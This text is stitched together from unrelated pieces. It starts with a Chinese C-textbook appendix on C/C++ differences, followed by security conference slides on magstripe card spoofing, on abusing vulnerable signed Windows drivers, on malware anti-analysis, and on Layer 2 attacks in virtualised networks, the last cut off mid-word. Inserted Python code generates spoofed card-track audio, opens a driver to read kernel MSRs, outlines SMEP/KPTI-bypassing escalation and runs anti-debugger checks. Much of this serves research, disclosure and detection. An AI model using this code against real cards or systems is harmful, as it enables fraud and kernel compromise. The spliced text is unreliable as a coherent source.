scanf("%lf", &im); // CMPLX()是C11中的一个特性 // v2 = CMPLX(re, im); v2 = re + im * I; printf("v1: "); show_cmlx(v1); putchar('\n'); 1624 printf("v2: "); show_cmlx(v2); putchar('\n'); sum = v1 + v2; prod = v1 * v2; conjug =conj(v1); printf("sum: "); show_cmlx(sum); putchar('\n'); printf("product: "); show_cmlx(prod); putchar('\n'); printf("complex congjugate of v1: "); show_cmlx(conjug); putchar('\n'); return 0; } void show_cmlx(complex double cv) { 1625 printf("(%.2f, %.2fi)", creal(cv), cimag(cv)); return; } 如果使用C++,会发现C++的complex头文件提供一种基于类的方式处理 复数,这与C的complex.h头文件使用的方法不同。 1626 B.9 参考资料IX:C和C++的区别 在很大程度上,C++是C的超集,这意味着一个有效的C程序也是一个 有效的C++程序。C和C++的主要区别是,C++支持许多附加特性。但是, C++中有许多规则与 C 稍有不同。这些不同使得 C 程序作为C++程序编译时 可能以不同的方式运行或根本不能运行。本节着重讨论这些区别。如果使用 C++的编译器编译C程序,就知道这些不同之处。虽然C和C++的区别对本书 的示例影响很小,但如果把C代码作为C++程序编译的话,会导致产生错误 的消息。 C99标准的发布使得问题更加复杂,因为有些情况下使得C更接近 C++。例如,C99标准允许在代码中的任意处进行声明,而且可以识别//注释 指示符。在其他方面,C99使其与C++的差异变大。例如,新增了变长数组 和关键字restrict。C11缩小了与C++的差异。例如,引进了char16_t类型,新 增了关键字_Alignas,新增了alignas宏与C++的关键字匹配。C11仍处于起步 阶段,许多编译器开发商甚至都没有完全支持C99。我们要了解C90、C99、 C11之间的区别,还要了解C++11与这些标准之间的区别,以及每个标准与C 标准之间的区别。这部分主要讨论C99、C11和C++之间的区别。当然, C++也正在发展,因此,C和C++的异同也在不断变化。 B.9.1 函数原型 在C++中,函数原型必不可少,但是在C中是可选的。这一区别在声明 一个函数时让函数名后面的圆括号为空,就可以看出来。在C中,空圆括号 说明这是前置原型,但是在C++中则说明该函数没有参数。也就是说,在 C++中,int slice();和int slice(void);相同。例如,下面旧风格的代码在C中可 以接受,但是在C++中会产生错误: int slice(); int main() { 1627 ... slice(20, 50); } ... int slice(int a, int b) { ... 
} 在C中,编译器假定用户使用旧风格声明函数。在C++中,编译器假定 slice()与slice(void)相同,且未声明slice(int, int)函数。 另外,C++允许用户声明多个同名函数,只要它们的参数列表不同即 可。 B.9.2 char常量 C把char常量视为int类型,而C++将其视为char类型。例如,考虑下面的 语句: char ch = 'A'; 在C中,常量'A'被储存在int大小的内存块中,更精确地说,字符编码被 储存为一个int类型的值。相同的数值也储存在变量ch中,但是在ch中该值只 占内存的1字节。 在C++中,'A'和ch都占用1字节。它们的区别不会影响本书中的示例。 但是,有些C程序利用char常量被视为int类型这一特性,用字符来表示整数 值。例如,如果一个系统中的int是4字节,就可以这样编写C代码: 1628 int x = 'ABCD'; /*对于int是4字节的系统,该语句出现在C程序中没问 题,但是出现在C++程序中会出错 */ 'ABCD'表示一个4字节的int类型值,其中第1个字节储存A的字符编码, 第2个字节储存B的字符编码,以此类推。注意,'ABCD'和"ABCD"不同。前 者只是书写int类型值的一种方式,而后者是一个字符串,它对应一个5字节 内存块的地址。 考虑下面的代码: int x = 'ABCD'; char c = 'ABCD'; printf("%d %d %c %c\n", x, 'ABCD', c, 'ABCD'); 在我们的系统中,得到的输出如下: 1094861636 1094861636 D D 该例说明,如果把'ABCD'视为int类型,它是一个4字节的整数值。但 是,如果将其视为char类型,程序只使用最后一个字节。在我们的系统中, 尝试用%s转换说明打印'ABCD'会导致程序奔溃,因为'ABCD'的数值 (1094861636)已超出该类型可表示的范围。 可以这样使用的原因是C提供了一种方法可单独设置int类型中的每个字 节,因为每个字符都对应一个字节。但是,由于要依赖特定的字符编码,所 以更好的方法是使用十六进制的整型常量,因为每两位十六进制数对应一个 字节。第15章详细介绍过相关内容(C的早期版本不提供十六进制记法,这 也许是多字符常量技术首先得到发展的原因)。 B.9.3 const限定符 在C中,全局的const具有外部链接,但是在C++中,具有内部链接。也 就是说,下面C++的声明: 1629 const double PI = 3.14159; 相当于下面C中的声明: static const double PI = 3.14159; 假设这两条声明都在所有函数的外部。C++规则的意图是为了在头文件 更加方便地使用 const。如果const变量是内部链接,每个包含该头文件的文 件都会获得一份const变量的备份。如果const变量是外部链接,就必须在一 个文件中进行定义式声明,然后在其他文件中使用关键字 extern 进行引用式 声明。 顺带一提,C++可以使用关键字extern使一个const值具有外部链接。所 以两种语言都可以创建内部链接和外部链接的const变量。它们的区别在于 默认使用哪种链接。 另外,在C++中,可以用const来声明普通数组的大小: const int ARSIZE = 100; double loons[ARSIZE]; /* 在C++中,与double loons[100];相同 */ 当然,也可以在C99中使用相同的声明,不过这样的声明会创建一个变 长数组。 在C++中,可以使用const值来初始化其他const变量,但是在C中不能这 样做: const double RATE = 0.06;      // C++和C都可以 const double STEP = 24.5;      // C++和C都可以 const double LEVEL = RATE * STEP; // C++可以,C不可以 B.9.4 结构和联合 1630 声明一个有标记的结构或联合后,就可以在C++中使用这个标记作为类 型名: struct duo { int a; int b; }; struct duo m; /* C和C++都可以 */ duo n; /* C不可以,C++可以*/ 结果是结构名会与变量名冲突。例如,下面的程序可作为C程序编译, 但是作为C++程序编译时会失败。因为C++把printf()语句中的duo解释成结构 类型而不是外部变量: #include <stdio.h> float duo = 100.3; int main(void) { struct duo { int a; int b;}; struct duo y = { 2, 4}; printf ("%f\n", duo); /* 在C中没问题,但是在C++不行 */ return 0; 1631 } 在C和C++中,都可以在一个结构的内部声明另一个结构: struct box { struct point {int x; int y; } upperleft; struct point lowerright; }; 在C中,随后可以使用任意使用这些结构,但是在C++中使用嵌套结构 时要使用一个特殊的符号: struct box ad;    /* C和 C++都可以 */ struct point dot;   /* C可以,C++不行 */ box::point dot;    /* C不行,C++可以 */ B.9.5 枚举 C++使用枚举比C严格。特别是,只能把enum常量赋给enum变量,然后 把变量与其他值作比较。不经过显式强制类型转换,不能把int类型值赋给 enum变量,而且也不能递增一个enum变量。下面的代码说明了这些问题: enum sample {sage, thyme, salt, pepper}; enum sample season; season = sage;      /* C和C++都可以 */ season = 2;       /* 在C中会发出警告,在C++中是一个错误 */ 1632 season = (enum sample) 3; /* C和C++都可以*/ season++;      /* C可以,在C++中是一个错误 */ 另外,在C++中,不使用关键字enum也可以声明枚举变量: enum sample {sage, thyme, salt, pepper}; sample season;  /* C++可以,在C中不可以 */ 与结构和联合的情况类似,如果一个变量和enum类型的同名会导致名 称冲突。 B.9.6 指向void的指针 C++可以把任意类型的指针赋给指向void的指针,这点与C相同。但是 不同的是,只有使用显式强制类型转换才能把指向void的指针赋给其他类型 的指针。下面的代码说明了这一点: int ar[5] = {4, 5, 6,7, 8}; int * pi; void * pv; pv = ar;     /* C和C++都可以 */ pi = pv;     /* C可以,C++不可以 */ pi = (int * ) pv; /* C和C++都可以 */ C++与C的另一个区别是,C++可以把派生类对象的地址赋给基类指 针,但是在C中没有这里涉及的特性。 B.9.7 布尔类型 1633 在C++中,布尔类型是bool,而且ture和false都是关键字。在C中,布尔 类型是_Bool,但是要包含stdbool.h头文件才可以使用bool、true和false。 B.9.8 可选拼写 在C++中,可以用or来代替||,还有一些其他的可选拼写,它们都是关键 字。在C99和C11中,这些可选拼写都被定义为宏,要包含iso646.h才能使用 它们。 B.9.9 宽字符支持 在C++中,wchar_t是内置类型,而且wchar_t是关键字。在C99和C11 中,wchar_t类型被定义在多个头文件中(stddef.h、stdlib.h、wchar.h、 wctype.h)。与此类似,char16_t和char32_t都是C++11的关键字,但是在C11 中它们都定义在uchar.h头文件中。 C++通过iostream头文件提供宽字符I/O支持(wchar_t、char16_t和 
char32_t),而 C99通过wchar.h头文件提供一种完全不同的I/O支持包。 B.9.10 复数类型 C++在complex头文件中提供一个复数类来支持复数类型。C有内置的复 数类型,并通过complex.h头文件来支持。这两种方法区别很大,不兼容。C 更关心数值计算社区提出的需求。 B.9.11 内联函数 C99支持了C++的内联函数特性。但是,C99的实现更加灵活。在 C++中,内联函数默认是内部链接。在 C++中,如果一个内联函数多次出现 在多个文件中,该函数的定义必须相同,而且要使用相同的语言记号。例 如,不允许在一个文件的定义中使用int类型形参,而在另一个文件的定义中 使用int32_t类型形参。即使用typedef把int32_t定义为int也不能这样做。但是 在C中可以这样做。另外,在第15章中介绍过,C允许混合使用内联定义和 外部定义,而C++不允许。 1634 B.9.12 C++11中没有的C99/C11特性 虽然在过去C或多或少可以看作是C++的子集,但是C99标准增加了一 些C++没有的新特性。下面列出了一些只有C99/C11中才有的特性: 指定初始化器; 复合初始化器(Compound initializer); 受限指针(Restricted pointer)(即,restric指针); 变长数组; 伸缩型数组成员; 带可变数量参数的宏。 注意 以上所列只是在特定时期内的情况,随着时间的推移和 C、C++的不断 发展,列表中的项会有所增减。例如,C++14新增的一个特性就与C99的变 长数组类似。 [1].也称为世界标准时间,简称UTC,从英文“Coordinated Universal Time”/法 文“Temps Universel Cordonné”而来。中国内地的时间与UTC的时差为+8,也 就是UTC+8。——译者注 [2].fwide()函数用于设置流的定向,根据mode的不同值来执行不同的工作。 ——译者注 1635
Exploiting 0ld Mag-stripe Information with New Technology
Salvador Mendoza
Twitter: @Netxing
Blog: salmg.net

About Me
● Security Researcher
● Samsung Pay: Tokenized Numbers, Flaws and Issues

Analyzing Previous Talks/Tools
● Major Malfunction - DEFCON 14 - Magstripe Madness
● Samy Kamkar - MagSpoof - 2015
● Weston Hecker - DEFCON 24 - Hacking Hotel Keys and Point of Sale Systems

Intro to Magnetic Stripe Information
● Type of card capable of storing data by modifying the magnetism of tiny iron-based magnetic particles on a band of magnetic material on the card
● TL;DR -> Track 1 = [UPPERCASE, numbers]; Track 2/3 = Numbers
(Source: samy.pl)

Magstripe Composition
%B4929555123456789^MALFUNCTION/MAJOR ^0902201010000000000000970000000?

Magstripe Info, Parity, and Waves

Magstripe Signal

Major Malfunction - DEFCON 14
https://www.youtube.com/watch?v=ITihB1c3dHw

BlueSpoof Descendancy
● MagSpoof / MagSpoofPI / SamyKam
● First prototypes: https://www.samy.pl
● Designed PCB by @electronicats
● Weston Hecker - DEFCON 24

Sound Amplifier

Raspberry Pi + Amplifier + Coil

Raspberry Pi - Demo

Bluetooth Technology

Bluetooth Speaker

MagSpoof Cousin: BlueSpoof
● MagSpoof: Electronic Cats (@electronicats) design

BlueSpoof Tool - Characteristics
● Cheap (< $20)
● Easy to implement
● Scalable
● 3.7 V battery
● Fast transmission
● Accurate

BlueSpoof - Demo
https://www.youtube.com/watch?v=elzqLhLnCek

Multiple Targets?
Token 1 / Token 2

Controlling Multiple Speakers?
● Python Sound Device Library: https://pypi.python.org/pypi/sounddevice

Attack with Multiple Bluetooth Speakers?
https://www.youtube.com/watch?v=5hInVNLUC8s

Demo Bonus
Take-Away Project: iWey

SamyKam
https://salmg.net/2017/01/16/samykam/

Greetz, Hugs & Stuff
● Samy Kamkar (@samykamkar)
● Electronic Cats (@electronicats)
● RMHT (raza-mexicana.org)
● Los Razos!

Questions?
Salvador Mendoza
Twitter: @Netxing
Blog: salmg.net
sal@salmg.net
Thank you! Happy Hacking Anniversary!

Resources
● Samy Kamkar: samy.pl/magspoof
● Electronic Cats: twitter.com/electronicats
● Major Malfunction: youtube.com/watch?v=ITihB1c3dHw
● Weston Hecker: youtube.com/watch?v=mV_0k9Fh590
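The audio path used in the Raspberry Pi and Bluetooth-speaker builds comes down to synthesizing the F2F (Aiken biphase) waveform in software and pushing it through an amplifier and coil. Below is a minimal sketch of that idea using the Python sounddevice library the talk references; the track-2 string, sync-zero counts, and samples-per-bit rate are illustrative assumptions, and the LRC character is omitted for brevity:

```python
import numpy as np
import sounddevice as sd          # https://pypi.python.org/pypi/sounddevice

SAMPLE_RATE = 44100
SAMPLES_PER_BIT = 64              # assumption: controls the effective swipe speed
TRACK2 = ";123456789010=25051010000000000000?"   # made-up track-2 data

def track2_bits(data):
    """Track 2 alphabet is ASCII 0x30-0x3F: 4 data bits LSB-first + odd parity."""
    bits = [0] * 25                               # leading sync zeros
    for ch in data:
        nibble = [(ord(ch) - 0x30 >> i) & 1 for i in range(4)]
        bits += nibble + [1 - sum(nibble) % 2]    # odd parity bit
    return bits + [0] * 25                        # trailing zeros (LRC omitted)

def f2f_wave(bits, spb):
    """Aiken biphase: transition at every bit cell, extra mid-cell transition for a 1."""
    level, out = 1.0, []
    for b in bits:
        if b:
            out += [level] * (spb // 2)
            level = -level
            out += [level] * (spb - spb // 2)
        else:
            out += [level] * spb
        level = -level                            # flip at every cell boundary
    return np.asarray(out, dtype=np.float32)

samples = f2f_wave(track2_bits(TRACK2), SAMPLES_PER_BIT)
sd.play(samples, SAMPLE_RATE)     # route to the amp/coil or a paired Bluetooth speaker
sd.wait()
```

Driving several paired speakers at once, as in the multi-target demo, is then mostly a matter of selecting different output devices through sounddevice's device selection and replaying the same buffer.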
Jesse Michael
Mickey Shkatov
@JesseMichael @HackingThings

WHO ARE WE

AGENDA
• Beginning
• .
• .
• .
• .
• Conclusions
• Q&A

PRIOR WORK
• Diego Juarez
  • https://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
  • https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
  • https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
• @ReWolf
  • https://github.com/rwfpl/rewolf-msi-exploit + blog post link in Readme
• @NOPAndRoll (Ryan Warns) / Timothy Harrison
  • https://downloads.immunityinc.com/infiltrate2019-slidepacks/ryan-warns-timothy-harrison-device-driver-debauchery-msr-madness/MSR_Madness_v2.9_INFILTRATE.pptx
• @SpecialHoang
  • https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b

BACKGROUND
[Diagram: Application -> Windows OS -> Driver -> Device]

BACKGROUND
[Diagram: Application -> Windows OS -> Driver -> Device, with REQUEST / MAGIC / REQUEST labels on the arrows]
• DeviceIoControl(dev, ioctl, inbuf, insize, ...)
• IOCTL handler in driver called with IRP struct
  • contains args passed from userspace

HOW IT'S MADE
• Windows drivers
  • Signed
  • WHQL signed
  • EV signing cert (a must for the Win10 signing process)
• (Speaker note: briefly explain the process of signing code)

KNOWN THREATS
• RWEverything
• LoJax
• Slingshot
• Game Cheats and Anti-Cheats (CapCom and others)
• MSI + ASUS + GIGABYTE + ASROCK

Read & Write Everything
• Utility to access almost all hardware interfaces via software
• User-space app + signed RwDrv.sys driver
• Driver acts as a privileged proxy to hardware interfaces
• Allows arbitrary access to privileged resources not intended to be available to user-space
• CHIPSEC helper to use RwDrv.sys when available

LoJax
• First UEFI malware found in the wild
• Implant tool includes RwDrv.sys driver from RWEverything
• Loads driver to gain direct access to SPI controller in PCH
• Uses direct SPI controller access to rewrite UEFI firmware

Slingshot
• APT campaign brought along its own malicious driver
• Active from 2012 through at least 2018
• Exploited other drivers with read/write MSR to bypass Driver Signing Enforcement to install kernel rootkit

Motivations
1. Privilege escalation from Userspace to Kernelspace
2. Bypass/disable Windows security mechanisms
3. Direct hardware access
   • Can potentially rewrite firmware

Attack Scenarios
1. Driver is already on system and loaded
   • Access to driver is controlled by policy configured by driver itself
   • Many drivers allow access by non-admin
2. Driver is already on system and not loaded
   • Need admin privs to load driver
   • Can also wait until admin process loads driver to avoid needing admin privs
3. Malware brings driver along with it
   • Need admin privs to load driver
   • Can bring older version of driver
   • LoJax did this for in-the-wild campaign

Finding drivers
1. Signed drivers
2. Focused on drivers from firmware/hardware vendors
3. Size (< 100KB)
4. rdmsr/wrmsr, mov crN, in/out opcodes are big hints
5. Windows Driver Model vs Windows Driver Framework

Finding drivers
[Figure: Windows Driver Model vs. Windows Driver Framework]
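One cheap way to act on hint #4 when triaging a pile of candidate .sys files is to grep for the raw opcode bytes before opening anything in a disassembler. A rough sketch (file names and workflow are illustrative, not the team's actual tooling):

```python
import sys

# Quick triage, not disassembly: these byte patterns also occur by accident in
# data and unrelated code, so a hit only flags a driver for manual review.
HINTS = {
    b"\x0f\x30": "wrmsr",
    b"\x0f\x32": "rdmsr",
    b"\x0f\x22": "mov crN, reg",
    b"\x0f\x20": "mov reg, crN",
}   # in/out are single-byte opcodes and far too noisy to grep for

for path in sys.argv[1:]:
    blob = open(path, "rb").read()
    hits = {name: blob.count(pat) for pat, name in HINTS.items() if pat in blob}
    if hits:
        print(f"{path}: {hits}")
```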
Finding drivers
• IoCreateDevice vs. WdmlibIoCreateDeviceSecure

Security Descriptor Definition Language (SDDL)
• Used to specify security policy for driver
Example:
• D:P(A;;GA;;;SY)(A;;GA;;;BA)
DACL that allows:
• GENERIC_ALL to Local System
• GENERIC_ALL to Built-in Administrators

Finding drivers
• Spent 2 weeks looking for drivers
• We skimmed through hundreds of files
• At least 42 vulnerable signed x64 drivers
• Found others since ¯\_(ツ)_/¯

NOW WHAT
What can we do from user space with a bad driver?
• Physical memory access
• MMIO
• MSR Read & Write
• Control register access
• PCI device access
• SMBUS
• And more...

Arbitrary Ring0 memcpy
• Can be used to patch kernel code and data structures
• Steal tokens, elevate privileges, etc
• PatchGuard can catch some modifications, but not all

Arbitrary Physical Memory Write
• Another mechanism to patch kernel code and data structures
• Steal tokens, elevate privileges, etc
• PatchGuard can catch some modifications, but not all
• Can also be used to perform MMIO access to PCIe and other devices

Lookup Physical Address from Virtual Address
• Useful when dealing with IOCTLs that provide Read/Write using physical addresses

Arbitrary MSR Read
Model Specific Registers
• Originally used for "experimental" features not guaranteed to be present in future processors
• Some MSRs have now been classified as architectural and will be supported by all future processors
• MSRs can be per-package, per-core, or per-thread
• Access to these registers is via rdmsr and wrmsr opcodes
• Only accessible by Ring0

Arbitrary MSR Write
Security-critical architectural MSRs
• STAR (0xC0000081)
  • SYSCALL EIP address and Ring 0 and Ring 3 segment base
• LSTAR (0xC0000082)
  • The kernel's RIP for SYSCALL entry for 64-bit software
• CSTAR (0xC0000083)
  • The kernel's RIP for SYSCALL entry in compatibility mode
Entrypoints used in transition from Ring3 to Ring0

Arbitrary Control Register Read
CR0 contains key processor control bits:
• PE: Protected Mode Enable
• WP: Write Protect
• PG: Paging Enable
CR3 = Base of page table structures
CR4 contains additional security-relevant control bits:
• UMIP: User-Mode Instruction Prevention
• VMXE: Virtual Machine Extensions Enable
• SMEP: Supervisor Mode Execution Protection Enable
• SMAP: Supervisor Mode Access Protection Enable

Arbitrary Control Register Write
• The same CR0 / CR3 / CR4 bits listed above, now attacker-writable

Arbitrary IO Port Write
• How dangerous this is depends on what's in the system
• Servers may have ASPEED BMC with Pantsdown vulnerability which provides read/write into BMC address space via IO port access
• Laptops likely have embedded controller (EC) reachable via IO port access
• Can potentially be used to perform legacy PCI access by accessing ports 0xCF8/0xCFC

Arbitrary Legacy PCI Write
• How dangerous this is depends on what's in the system
• Issues with overlapping PCI device BAR over memory regions
• Overlapping PCI device over TPM region
• Memory hole attack

CAN I DO IT TOO?
• Can we get our own code signing cert?
• Process and cost
• Legality
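To make the earlier DeviceIoControl picture concrete before walking the full escalation chain, this is roughly what reaching one of these primitives from an unprivileged process looks like. The device name, IOCTL code, and buffer layout here are invented placeholders rather than any real driver's interface; the only real constant is the LSTAR MSR index used as the example read target:

```python
import ctypes
from ctypes import wintypes

# Hypothetical target-specific values -- every vulnerable driver exposes its
# own device name, control codes, and input/output layout.
DEVICE_PATH    = r"\\.\HypotheticalVulnDrv"
IOCTL_READ_MSR = 0x9C402084            # placeholder METHOD_BUFFERED control code

GENERIC_READ   = 0x80000000
GENERIC_WRITE  = 0x40000000
OPEN_EXISTING  = 3
INVALID_HANDLE = wintypes.HANDLE(-1).value

k32 = ctypes.windll.kernel32
k32.CreateFileW.restype = wintypes.HANDLE

# Weak (or missing) SDDL on the device object is what lets a non-admin get here.
handle = k32.CreateFileW(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
                         0, None, OPEN_EXISTING, 0, None)
if handle == INVALID_HANDLE:
    raise OSError("device not present or access denied")

# Assumed layout: caller passes a 4-byte MSR index, driver returns the 64-bit
# value it read in Ring0.  IA32_LSTAR (0xC0000082) leaks the kernel's syscall
# entry point -- step one of the escalation chain described next.
msr_index = ctypes.c_uint32(0xC0000082)
msr_value = ctypes.c_uint64(0)
returned  = wintypes.DWORD(0)

ok = k32.DeviceIoControl(handle, IOCTL_READ_MSR,
                         ctypes.byref(msr_index), ctypes.sizeof(msr_index),
                         ctypes.byref(msr_value), ctypes.sizeof(msr_value),
                         ctypes.byref(returned), None)
if ok:
    print(f"LSTAR = {msr_value.value:#018x}")
k32.CloseHandle(handle)
```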
Putting it all together High-level steps to escalate from Ring3 to Ring0 via MSR access • Allocate buffer for Ring0 payload • Read LSTAR MSR to find address of kernel syscall handler • Generate payload that immediately restores LSTAR MSR and performs malicious Ring0 actions • Write address of payload to LSTAR MSR • Payload immediately executes in Ring0 on next syscall entry It's a little more complicated than that... Supervisor Mode Execution Prevention (SMEP) • Feature added to CPU to prevent kernel from executing code from user pages • Attempting to execute code in user pages when in Ring0 causes page fault • Controlled by bit in CR4 register Need to read CR4, clear CR4.SMEP bit, write back to CR4 • This can be done via Read/Write CR4 IOCTL primitive or via ROP in payload • Payload starts executing in Ring0, but hasn't switched to kernelspace yet • Need to execute swapgs as first instruction • Also need to execute swapgs before returning from kernel payload • Kernel Page Table Isolation (KPTI) • New protection to help mitigate Meltdown CPU vulnerability • Separate page tables for userspace and kernelspace • Need to find kernel page table base and write that to CR3 • We can use CR3 read IOCTL to leak Kernel CR3 value when building payload It's a little more complicated than that... • AV industry • What good is an AV when you can bypass it, and how can the AV help stop this lunacy. • Microsoft • Virtualization-based Security (VBS) • Hypervisor-enforced Code Integrity (HVCI) • Device Guard • Black List IS THERE HOPE? • Manually searching drivers can be tedious • Can we automate the process? • Symbolic execution with angr framework • Got initial script working in about a day • Works really well in some cases • Combinatorial state explosion in others Automating Detection Automating Detection • Testing out the idea... • Load the driver into angr • Create a state object to start execution at IOCTL handler Automating Detection • Testing out the idea... • Create symbolic regions for parts of IRP • Store those into symbolic memory • And set appropriate pointers in execution state Automating Detection • Testing out the idea... • Create simulation manager based on state • Explore states trying to reach the address of WRMSR opcode • If found, show where the WRMSR arguments came from Automating Detection • It worked! • Completed in less than five seconds • WRMSR address and value are both taken from input buffer Automating Detection • We can also automatically find IOCTL handler function • Set memory write breakpoint on drvobj->MajorFunction[14] • Explore states forward from driver entry point Automating Detection • Problems... • Current code only supports WDM drivers • Have some ideas how to support WDF drivers • Angr uses VEX intermediate representation lifting • VEX is part of Valgrind • Has apparently never been used to analyze privileged code • Decode error on rdmsr/wrmsr, read/write CR, read/write DR opcodes • Some drivers cause it blow up and use 64GB of ram DISCLOSURES DISCLOSURES DISCLOSURES • Ask Microsoft what’s their policy regarding bad drivers • Not a security issue, open a regular ticket • This might be an issue, are you sure? • Meh, Not an issue • Are you REALLY, REALLY, sure? • Ok, let us check • … • Ok, We will do something about it • THANK YOU! 
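Referring back to the "Automating Detection" slides above, the approach can be sketched in a few lines of angr. This is a heavily simplified illustration under stated assumptions: the driver path and the two addresses are placeholders you would take from your own disassembly, and the IRP/IO_STACK_LOCATION modeling described on the slides is omitted so that unread inputs simply stay symbolic.

import angr

DRIVER        = "vulnerable_driver.sys"  # placeholder path to the target driver
IOCTL_HANDLER = 0x140005A10              # placeholder: IRP_MJ_DEVICE_CONTROL handler
WRMSR_ADDR    = 0x140006120              # placeholder: address of a wrmsr instruction

proj = angr.Project(DRIVER, auto_load_libs=False)

# Blank state at the dispatch routine: the argument registers and the IRP they
# point at are left unconstrained, so anything the handler reads from them
# remains symbolic.
state = proj.factory.blank_state(addr=IOCTL_HANDLER)

simgr = proj.factory.simulation_manager(state)
simgr.explore(find=WRMSR_ADDR)

if simgr.found:
    st = simgr.found[0]
    # wrmsr takes the MSR index in ecx and the value in edx:eax; if those are
    # still symbolic here, they were derived from caller-controlled input.
    print("wrmsr reachable")
    print("  ecx symbolic:", st.solver.symbolic(st.regs.ecx))
    print("  eax symbolic:", st.solver.symbolic(st.regs.eax))
else:
    print("no path found (unreachable, or state explosion)")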
• Sent disclosure Friday 5pm • Response came back Saturday morning • Fix ready to start deployment in 6 weeks DISCLOSURES All the primitives in one driver • Physical and virtual memory read/write • Read/Write MSR • Read/Write CR • Legacy Read/Write PCI via IN/OUT • IN/OUT DISCLOSURES ADVISORIES Vendor Date Advisory Intel July 9, 2019 https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa- 00268.html Huawei July 10, 2019 https://www.huawei.com/fr/psirt/security-advisories/huawei-sa-20190710-01- pcmanager-en Phoenix TBD TBD REDACTED Aug 13, 2019 TBD REDACTED TBD TBD NO RESPONSE Microsoft Statement • Microsoft has a strong commitment to security and a demonstrated track record of investigating and proactively updating impacted devices as soon as possible. For the best protection, we recommend using Windows 10 and the Microsoft Edge browser. • In order to exploit vulnerable drivers, an attacker would need to have already compromised the computer. To help mitigate this class of issues, Microsoft recommends that customers use Windows Defender Application Control to block known vulnerable software and drivers. • Customers can further protect themselves by turning on memory integrity for capable devices in Windows Security. • Bad drivers can be immensely dangerous • Risk remains when old drivers can still be loaded by Windows • We want to kill off this entire bug class Conclusions • GitHub release of all of our code • https://github.com/eclypsium/Screwed-Drivers Code release Questions?
Module 3 Understanding and countering malware’s evasion and self-defence https://github.com/hasherezade/malware_training_vol1 Introduction Malware: Evasion and self-defense Malware: Evasion and self-defense • In order to carry out its mission, malware must remain undetected • Malware needs to defend itself from: • Antimalware products (on the victim machine) • Analysis tools and sandboxes (on a researcher’s machine) Malware: Evasion and self-defense • Approaches: • Passive: • obfuscation (at the level of: code, control flow, strings, used APIs) • Active: • environment fingerprinting, detection of the analysis tools, and: • interference with them (e.g. uninstalling AV products, unhooking hooks) • altering its own behavior (deploying a decoy, or terminating execution) The passive approach: obfuscation • Related to the way the code is designed: e.g. using exception handlers to switch between various code blocks, using dynamically loaded functions, string obfuscation, polymorphic code, etc. • Added at the compilation level: e.g. adding junk instructions, complicating control flow (example: movfuscator) • Added at the linking level: atypical PE header, atypical section alignment • Post-compilation: using protectors • Depending on the degree of obfuscation, it may be difficult to defeat Deobfuscation • Approaches: • Dynamic: • Code instrumentation, tracing: quickly reveals what the code does, without reconstructing all details of the implementation – quick and generic, but we may miss the parts that haven’t been executed during the test runs • Static: • analysis of the code and cleaning/resolving the obfuscated parts, reconstruction of the control flow – may be more accurate, but laborious, and requires a different approach for each particular case The active approach: fingerprinting • Mostly related to the way the code is designed: additional functions perform environment fingerprinting to find artefacts indicating analysis • Post-compilation: using protectors with an added anti-debug/anti-VM layer, underground crypters specialized in AV/sandbox evasion • Most of the methods used are well-known, and the fact of using them can be relatively easily detected Anti-evasion • Approaches: • Sample-oriented: • Patching: finding the checks and removing them • Environment-oriented: • VM hardening: changing default settings and strings that are commonly checked to identify a VM • Using debugger plugins specialized in hiding the debugger’s presence (e.g. by overwriting values in the PEB), changing default window names • Using tools that are less often targeted by the checks: e.g. Intel Pin
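To make the "active" fingerprinting approach above concrete, here is a minimal sketch of the sort of debugger checks such code performs. It is written in Python via ctypes purely for illustration and assumes a Windows host; real samples do the equivalent natively and stack many more checks (VM artefacts, process and window names, timing via rdtsc).

import ctypes
from ctypes import wintypes

kernel32 = ctypes.windll.kernel32
kernel32.GetTickCount64.restype = ctypes.c_ulonglong

def debugger_checks():
    results = {}

    # Documented API: reads the BeingDebugged flag from the PEB.
    results["IsDebuggerPresent"] = bool(kernel32.IsDebuggerPresent())

    # Asks the kernel whether a debugger is attached to this process.
    flag = wintypes.BOOL(False)
    kernel32.CheckRemoteDebuggerPresent(kernel32.GetCurrentProcess(),
                                        ctypes.byref(flag))
    results["CheckRemoteDebuggerPresent"] = bool(flag.value)

    # Crude timing check: single-stepping or heavy instrumentation makes a
    # trivial loop take far longer than it normally would.
    start = kernel32.GetTickCount64()
    for _ in range(100000):
        pass
    results["suspiciously_slow"] = (kernel32.GetTickCount64() - start) > 100

    return results

if __name__ == "__main__":
    for check, hit in debugger_checks().items():
        print(check, "->", hit)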
Exploring Layer 2 Network Security in Virtualized Environments Ronny L. Bull & Jeanna N. Matthews Road Map © 2015 Ronny L. Bull - Clarkson University ● Context for the Problem of Layer 2 Network Security in Virrtualized Environments – Virtualization, Multi-tenant environments, Cloud services – Physical networking basics → Virtual networking basics ● Test platforms – Array of virtual networking implementations tested ● Specific attacks and results – MAC Flooding, DHCP Attacks – Mitigations ● Next steps and conclusions Virtualization Overview © 2015 Ronny L. Bull - Clarkson University Virtual Networking © 2015 Ronny L. Bull - Clarkson University Multi-Tenancy © 2015 Ronny L. Bull - Clarkson University What If? © 2014 Ronny L. Bull - Clarkson University Multi-Tenant Cloud Services © 2015 Ronny L. Bull - Clarkson University ● Amazon EC2 ● Microsoft Azure ● Google Cloud Services ● Countless fly by night VPS hosting providers online ● Brick and mortar data centers serving local clients ● Similarities – Most run some form of Xen (OS Xen, XenServer) – Some use VMWare or Hyper-V – All share network connectivity between tenants Key Question © 2015 Ronny L. Bull - Clarkson University ● Since all client virtual machines are essentially connected to a virtual version of a physical networking device, do Layer 2 network attacks that typically work on physical devices apply to their virtualized counterparts? ● Important question to explore: – All cloud services that rely on virtualized environments could be vulnerable – This includes data centers hosting mission critical or sensitive data! ● Not the only class of attacks from co-located VMs ● Old lesson: vulnerable to those close to you Bottom Line © 2015 Ronny L. Bull - Clarkson University ● Initial research experiments show that virtualized network devices DO have the potential to be exploited in the same manner as physical devices ● In fact some of these environments allow the attack to spill out of the virtualized network and affect the physical networks they are connected to! – MAC Flooding in Citrix XenServer ● Allows eavesdropping on physical network traffic as well as traffic on the virtual host Possible Attacks © 2015 Ronny L. Bull - Clarkson University ● What if another tenant can successfully launch a Layer 2 network attack within a multi-tenant environment? – Capture all network traffic – Redirect traffic – Perform Man-in-the-Middle attacks – Denial 